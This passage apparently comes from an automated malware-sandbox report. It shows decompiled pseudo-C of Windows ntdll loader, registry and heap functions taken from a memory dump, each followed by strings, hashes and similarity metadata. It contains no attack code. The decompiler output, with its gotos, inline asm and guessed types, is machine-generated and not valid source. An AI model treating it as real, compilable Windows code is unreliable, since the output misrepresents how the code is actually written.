						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01238999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01238999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1315c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1315c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01242280(_t92, 0x13186cc);
															_t94 = E012F9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012561A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1315c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01238A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1315c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1315c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0126F380(_t136, 0x1201184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01242280(_t108, 0x13186cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012561A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E012F9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0123FFB0(_t118, _t156, 0x13186cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01269A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                            0x01238799
                                            0x0123879d
                                            0x012387a1
                                            0x012387a3
                                            0x012387a8
                                            0x012387c3
                                            0x012387c3
                                            0x012387c8
                                            0x012387d1
                                            0x012387d4
                                            0x012387d8
                                            0x012387e5
                                            0x012387ec
                                            0x01289bfe
                                            0x01289c00
                                            0x01289c02
                                            0x01289c08
                                            0x01289c0d
                                            0x01289c0f
                                            0x01289c14
                                            0x01289c2d
                                            0x01289c32
                                            0x01289c37
                                            0x01289c3a
                                            0x01289c3c
                                            0x01289c42
                                            0x01289c42
                                            0x01289c3c
                                            0x01289c02
                                            0x012387da
                                            0x012387df
                                            0x012387e3
                                            0x00000000
                                            0x00000000
                                            0x012387e3
                                            0x012387f2
                                            0x00000000
                                            0x012387fb
                                            0x012387fd
                                            0x012387fe
                                            0x0123880e
                                            0x0123880f
                                            0x01238810
                                            0x01238814
                                            0x0123881a
                                            0x0123881c
                                            0x0123881f
                                            0x01238821
                                            0x01238822
                                            0x01238824
                                            0x01238826
                                            0x0123882c
                                            0x0123882e
                                            0x01289c48
                                            0x01289c48
                                            0x01238834
                                            0x01238834
                                            0x01238837
                                            0x00000000
                                            0x00000000
                                            0x01238837
                                            0x0123882e
                                            0x0123883d
                                            0x01238840
                                            0x01238843
                                            0x01238846
                                            0x01238849
                                            0x0123884c
                                            0x0123884e
                                            0x01238850
                                            0x01238852
                                            0x01238854
                                            0x01238857
                                            0x012388b4
                                            0x012388b6
                                            0x012388b6
                                            0x01238859
                                            0x01238859
                                            0x01238859
                                            0x01238861
                                            0x01238866
                                            0x0123886a
                                            0x0123893d
                                            0x01238941
                                            0x00000000
                                            0x01238947
                                            0x01238947
                                            0x0123894a
                                            0x0123894c
                                            0x00000000
                                            0x01238952
                                            0x01238955
                                            0x0123895a
                                            0x0123895d
                                            0x0123895d
                                            0x0123895f
                                            0x01238961
                                            0x01238961
                                            0x01238968
                                            0x00000000
                                            0x00000000
                                            0x0123896a
                                            0x0123896b
                                            0x0123896e
                                            0x00000000
                                            0x01238970
                                            0x01238970
                                            0x01238970
                                            0x01238970
                                            0x01238972
                                            0x01238972
                                            0x01238974
                                            0x00000000
                                            0x0123897a
                                            0x0123897a
                                            0x0123897d
                                            0x00000000
                                            0x01238983
                                            0x01289c65
                                            0x01289c6d
                                            0x01289c72
                                            0x01289c75
                                            0x01289c75
                                            0x01289c82
                                            0x01289c86
                                            0x01289c87
                                            0x01289c88
                                            0x01289c89
                                            0x01289c8c
                                            0x01289c90
                                            0x01289c95
                                            0x01289c97
                                            0x01289ca0
                                            0x01289ca3
                                            0x01289ca9
                                            0x01289ca9
                                            0x00000000
                                            0x01289ca9
                                            0x01289ca3
                                            0x00000000
                                            0x01289c97
                                            0x0123897d
                                            0x00000000
                                            0x01238974
                                            0x01238988
                                            0x01238992
                                            0x01238996
                                            0x00000000
                                            0x01238996
                                            0x0123894c
                                            0x00000000
                                            0x01238870
                                            0x0123887b
                                            0x0123887d
                                            0x0123887f
                                            0x01238881
                                            0x01238884
                                            0x01238884
                                            0x01238886
                                            0x01238889
                                            0x0123888c
                                            0x0123888e
                                            0x01238891
                                            0x01238891
                                            0x01238898
                                            0x00000000
                                            0x00000000
                                            0x0123889a
                                            0x0123889b
                                            0x0123889e
                                            0x00000000
                                            0x00000000
                                            0x012388a0
                                            0x012388a8
                                            0x012388b0
                                            0x012388b2
                                            0x012388d3
                                            0x012388d5
                                            0x00000000
                                            0x012388d7
                                            0x012388db
                                            0x012388dc
                                            0x012388e0
                                            0x012388e8
                                            0x012388ee
                                            0x012388f0
                                            0x012388f3
                                            0x012388fc
                                            0x01238901
                                            0x01238906
                                            0x0123890c
                                            0x0123890c
                                            0x0123890f
                                            0x01238916
                                            0x01238917
                                            0x01238918
                                            0x01238919
                                            0x0123891a
                                            0x0123891f
                                            0x01238921
                                            0x01289c52
                                            0x01289c55
                                            0x01289c5b
                                            0x01289cac
                                            0x01289cc0
                                            0x01289cc0
                                            0x01289c55
                                            0x01238927
                                            0x01238927
                                            0x0123892f
                                            0x01238933
                                            0x00000000
                                            0x012388f5
                                            0x012388f5
                                            0x00000000
                                            0x012388f7
                                            0x012388f7
                                            0x012388fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012388fa
                                            0x012388f5
                                            0x012388f3
                                            0x00000000
                                            0x012388d5
                                            0x00000000
                                            0x012388b2
                                            0x012388c9
                                            0x00000000
                                            0x012388c9
                                            0x0123887f
                                            0x0123886a
                                            0x01238857
                                            0x01238852
                                            0x012388bf
                                            0x012388bf
                                            0x012387aa
                                            0x012387ad
                                            0x012387ae
                                            0x012387b4
                                            0x012387b5
                                            0x012387b6
                                            0x012387b8
                                            0x012387bd
                                            0x012387c1
                                            0x012387f4
                                            0x012387fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x012387c1
                                            0x00000000

                                            Strings
                                            • LdrpDoPostSnapWork, xrefs: 01289C1E
                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01289C18
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01289C28
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 2994545307-1948996284
                                            • Opcode ID: 6fc2c653470430ab2d1f961f1411c5c000876e57e9eed909a2cdd658f3ce3a2e
                                            • Instruction ID: a2da4bd4151a096d1a3e7af1f221b3463bfa1593c7e058dbe4236d68051eca9e
                                            • Opcode Fuzzy Hash: 6fc2c653470430ab2d1f961f1411c5c000876e57e9eed909a2cdd658f3ce3a2e
                                            • Instruction Fuzzy Hash: 2891F3B1A2020B9BEF19DF59D881A7AB7B5FFC4314B544269FA01AF241D770EA41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01237E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E01237E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0123CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0122C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1315780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E012A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1315780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01247D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01247D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E012A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01247D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01247D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E012A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0125A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0122B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                            0x01237e4c
                                            0x01237e50
                                            0x01237e55
                                            0x01237e58
                                            0x01237e5d
                                            0x01237e71
                                            0x01237f33
                                            0x01237e77
                                            0x01237e77
                                            0x01237e79
                                            0x01237e79
                                            0x01237e7e
                                            0x01237f45
                                            0x01289848
                                            0x00000000
                                            0x01289848
                                            0x01237f4e
                                            0x01237f53
                                            0x01237f5a
                                            0x00000000
                                            0x00000000
                                            0x0128985a
                                            0x01289862
                                            0x01289866
                                            0x00000000
                                            0x0128986c
                                            0x00000000
                                            0x0128986c
                                            0x01237e84
                                            0x01237e84
                                            0x01237e8d
                                            0x01289871
                                            0x01237eb8
                                            0x01237ec0
                                            0x01237ec0
                                            0x01237e9a
                                            0x0128987e
                                            0x00000000
                                            0x00000000
                                            0x01289884
                                            0x0128988b
                                            0x012898a7
                                            0x012898ac
                                            0x012898b1
                                            0x012898b6
                                            0x012898b8
                                            0x012898b8
                                            0x012898b9
                                            0x00000000
                                            0x012898b9
                                            0x01237ea0
                                            0x01237ea7
                                            0x00000000
                                            0x00000000
                                            0x01237eac
                                            0x01237eb1
                                            0x01237ec6
                                            0x01237ed0
                                            0x012898cc
                                            0x01237ed6
                                            0x01237ed6
                                            0x01237ed6
                                            0x01237ede
                                            0x01237ee3
                                            0x012898e3
                                            0x012898f0
                                            0x01289902
                                            0x012898f2
                                            0x012898fb
                                            0x012898fb
                                            0x01289907
                                            0x0128991d
                                            0x0128991d
                                            0x01289907
                                            0x012898e3
                                            0x01237ef0
                                            0x01237f14
                                            0x01237f14
                                            0x01237f1e
                                            0x01289946
                                            0x01237f24
                                            0x01237f24
                                            0x01237f24
                                            0x01237f2c
                                            0x0128996a
                                            0x01289975
                                            0x01289975
                                            0x0128997e
                                            0x01289993
                                            0x01289993
                                            0x0128997e
                                            0x00000000
                                            0x01237ef2
                                            0x01237efc
                                            0x01237f0a
                                            0x01237f0e
                                            0x01289933
                                            0x00000000
                                            0x01289933
                                            0x00000000
                                            0x01237f0e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01237eb1

                                            Strings
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 01289891
                                            • LdrpCompleteMapModule, xrefs: 01289898
                                            • minkernel\ntdll\ldrmap.c, xrefs: 012898A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: c42ef78a6940241b2e2d14d32896b5280f4f34ad9261dee657e2484fc7209e75
                                            • Instruction ID: caf80756643bab3e2dfb584000401125cd3235cbe114232e874aa458b3ff2095
                                            • Opcode Fuzzy Hash: c42ef78a6940241b2e2d14d32896b5280f4f34ad9261dee657e2484fc7209e75
                                            • Instruction Fuzzy Hash: 075100B1634742DBEF22DB6CC844B3A7BE4AB80714F040699EA519B7D1C770ED40CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0122E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0122E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0122F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E012695D0();
						}
						if(_t78 != 0) {
							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0126FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0126BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01269600();
					if(_t97 < 0) {
						goto L6;
					}
					E0126BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0122F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0126BB40(_t83, _t102 + 0x24, _t78);
								if(L012343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0126BB40(_t84, _t102 + 0x24, _t94);
									if(L012343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                            0x0122e620
                                            0x0122e628
                                            0x0122e62f
                                            0x0122e631
                                            0x0122e635
                                            0x0122e637
                                            0x0122e63e
                                            0x01285503
                                            0x01285503
                                            0x0122e64c
                                            0x0122e64c
                                            0x0122e651
                                            0x00000000
                                            0x00000000
                                            0x0122e661
                                            0x0122e665
                                            0x0128542a
                                            0x0122e715
                                            0x0122e71a
                                            0x0122e71c
                                            0x0122e720
                                            0x0122e720
                                            0x0122e727
                                            0x0122e736
                                            0x0122e736
                                            0x0122e743
                                            0x0122e743
                                            0x0122e673
                                            0x0122e678
                                            0x0122e67d
                                            0x0122e682
                                            0x0122e685
                                            0x0122e692
                                            0x0122e69b
                                            0x0122e6a3
                                            0x0122e6ad
                                            0x0122e6b1
                                            0x0122e6b2
                                            0x0122e6bb
                                            0x0122e6bf
                                            0x0122e6c0
                                            0x0122e6c8
                                            0x0122e6cc
                                            0x0122e6d5
                                            0x0122e6d9
                                            0x00000000
                                            0x00000000
                                            0x0122e6e5
                                            0x0122e6ea
                                            0x0122e6f9
                                            0x0122e70b
                                            0x0122e70f
                                            0x01285439
                                            0x0128545e
                                            0x0128545e
                                            0x00000000
                                            0x0128545e
                                            0x0128543b
                                            0x0128543e
                                            0x01285440
                                            0x01285445
                                            0x01285472
                                            0x01285475
                                            0x0128548d
                                            0x01285493
                                            0x012854a9
                                            0x00000000
                                            0x00000000
                                            0x012854ab
                                            0x012854b4
                                            0x012854bc
                                            0x012854c8
                                            0x012854de
                                            0x012854fb
                                            0x012854e0
                                            0x012854e6
                                            0x012854eb
                                            0x012854eb
                                            0x012854de
                                            0x00000000
                                            0x012854bc
                                            0x01285477
                                            0x0128547a
                                            0x01285480
                                            0x01285483
                                            0x01285486
                                            0x0128548b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0128548b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01285447
                                            0x01285447
                                            0x01285447
                                            0x01285447
                                            0x0128544e
                                            0x00000000
                                            0x00000000
                                            0x01285450
                                            0x01285452
                                            0x01285455
                                            0x0128545a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0128545c
                                            0x0128546a
                                            0x0128546d
                                            0x0128546f
                                            0x00000000
                                            0x0128546f
                                            0x0122e70f

                                            Strings
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0122E68C
                                            • InstallLanguageFallback, xrefs: 0122E6DB
                                            • @, xrefs: 0122E6C0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 9793f178ddfb9b103da1637530b6f0b6eafa890904ca809eae09633a445a1aca
                                            • Instruction ID: ba145e3ebe53186c0260fd860584b33292682dec3c9574cdff110f85257ff09d
                                            • Opcode Fuzzy Hash: 9793f178ddfb9b103da1637530b6f0b6eafa890904ca809eae09633a445a1aca
                                            • Instruction Fuzzy Hash: F651E2726253569BD714EF28C440A7BB3E8FF98614F05092EFA85D7290F734D944C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012EE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E012EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E012EBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E012EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E012EAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01269730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E012EA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E012EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01269730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E012EA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E012EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01242280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0123B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0123FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01247D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E012DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}





























